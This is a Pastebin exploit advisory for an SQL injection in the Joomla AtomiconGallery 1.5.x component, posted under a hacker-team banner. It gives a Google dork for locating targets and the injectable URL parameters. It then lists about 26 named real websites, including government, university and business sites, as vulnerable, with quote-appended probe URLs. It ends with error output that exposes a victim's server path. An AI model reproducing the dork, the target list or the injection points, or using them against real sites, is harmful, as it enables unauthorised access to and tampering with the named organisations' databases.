KingSkrupellos

Joomla AtomiconGallery Components 1.5.x SQL Injection

Jan 31st, 2019
115
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.75 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla AtomiconGallery Components 1.5.x SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 01/02/2019
  7. # Vendor Homepage : atomicon.nl
  8. # Software Download Link : atomicon.nl/wp-content/uploads/atomicon-gallery.zip
  9. # Software Information Link : atomicon.nl/atomicongallery
  10. # Software Version : 1.5.x
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:''/index.php?option=com_atomicongallery''
  15. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  16. Special Elements used in an SQL Command ('SQL Injection') ]
  17. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  18. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  19. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  20.  
  21. ####################################################################
  22.  
  23. # Description about Software :
  24. ***************************
  25. AtomiconGallery is a lightweight database-less gallery and it can be use for Joomla 1.5.x version.
  26.  
  27. ####################################################################
  28.  
  29. # Impact :
  30. ***********
  31. Joomla AtomiconGallery 1.5.x component for Joomla! is
  32.  
  33. prone to an SQL-injection vulnerability because it fails to sufficiently
  34.  
  35. sanitize user-supplied data before using it in an SQL query.
  36.  
  37. A successful exploit may allow an attacker to compromise the application, access
  38.  
  39. or modify data, or exploit latent vulnerabilities in the underlying database.
  40.  
  41. A remote attacker can send a specially crafted request to the vulnerable application
  42.  
  43. and execute arbitrary SQL commands in application`s database.
  44.  
  45. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  46.  
  47. An attacker can exploit this issue using a browser.
  48.  
  49. ####################################################################
  50.  
  51. # SQL Injection Exploit :
  52. **********************
  53.  
  54. /index.php?option=com_atomicongallery&folder=[SQL Injection]
  55.  
  56. /index.php?option=com_atomicongallery&view=atomicongallery&Itemid=[SQL Injection]
  57.  
  58. /index.php?option=com_atomicongallery&folder=Sample%20Images&lang=en&Itemid=[SQL Injection]
  59.  
  60. /index.php?option=com_atomicongallery&folder=Image%20Gallery&Itemid=[SQL Injection]
  61.  
  62. /index.php?option=com_atomicongallery&folder=[FOLDER-NAME-HERE]&Itemid=[SQL Injection]
  63.  
  64. ####################################################################
  65.  
  66. # Example Vulnerable Sites :
  67. *************************
  68.  
  69. [+] coastal.gov.lk/index.php?option=com_atomicongallery&folder=Image%20Gallery&Itemid=117%27
  70.  
  71. [+] smkst-teresa.edu.my/index.php?option=com_atomicongallery&folder=1%27
  72.  
  73. [+] hnc.edu.ps/portal/index.php?option=com_atomicongallery&folder=1%27
  74.  
  75. [+] onumujeres-ecuador.org/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=1%27
  76.  
  77. [+] ergulmakina.com.tr/home/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=62%27
  78.  
  79. [+] janschoutendakwerken.nl/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=3%27
  80.  
  81. [+] tomcatbakery.com/index.php?option=com_atomicongallery&view=atomicongallery&id=71%27
  82.  
  83. [+] azioniacatena.it/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=5%27
  84.  
  85. [+] zakariamusic.com/index.php?option=com_atomicongallery&folder=Studio&Itemid=64%27
  86.  
  87. [+] hotel-bougafer.com/v2/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=194%27
  88.  
  89. [+] ammpe.org/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=4%27
  90.  
  91. [+] shotgunshacks.nl/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=6%27
  92.  
  93. [+] gospin.pl/index.php?option=com_atomicongallery&folder=1%27
  94.  
  95. [+] aurbanska.ehost.pl/jml/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=93
  96.  
  97. [+] photonhellas.gr/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=75%27
  98.  
  99. [+] culaocham.info/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=24%27
  100.  
  101. [+] letsinvestmaldives.com/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=10%27
  102.  
  103. [+] szetule.pl/index.php?option=com_atomicongallery&folder=1%27
  104.  
  105. [+] meistersv.nl/index.php?option=com_atomicongallery&folder=1%27
  106.  
  107. [+] obec-lavicky.cz/index.php?option=com_atomicongallery&folder=1%27
  108.  
  109. [+] fetishmodel.ru/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=5%27
  110.  
  111. [+] homanpainting.com/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=65%27
  112.  
  113. [+] tunisieformations.com/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=18%27
  114.  
  115. [+] martin-hoy.co.uk/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=6%27
  116.  
  117. [+] research.pbru.ac.th/web/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=93%27
  118.  
  119. [+] guayab.com/index.php?option=com_atomicongallery&view=atomicongallery&Itemid=59%27
  120.  
  121. ####################################################################
  122.  
  123. # Example SQL Database Error :
  124. ****************************
  125.  
  126. Strict Standards: Non-static method JLoader::import() should not
  127. be called statically in /home3/onumujer/public_html
  128. /libraries/loader.php on line 186
  129.  
  130. Strict Standards: Non-static method JApplicationHelper::getPath()
  131. should not be called statically, assuming $this from incompatible
  132. context in /home3/onumujer/public_html/libraries/joomla
  133. /application/component/helper.php on line 168
  134.  
  135. Strict Standards: Non-static method JRequest::getCmd()
  136. should not be called statically, assuming $this from incompatible
  137. context in /home3/onumujer/public_html/libraries
  138. /joomla/application/helper.php on line 112
  139.  
  140. ####################################################################
  141.  
  142. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  143.  
  144. ####################################################################
Add Comment
Please, Sign In to add comment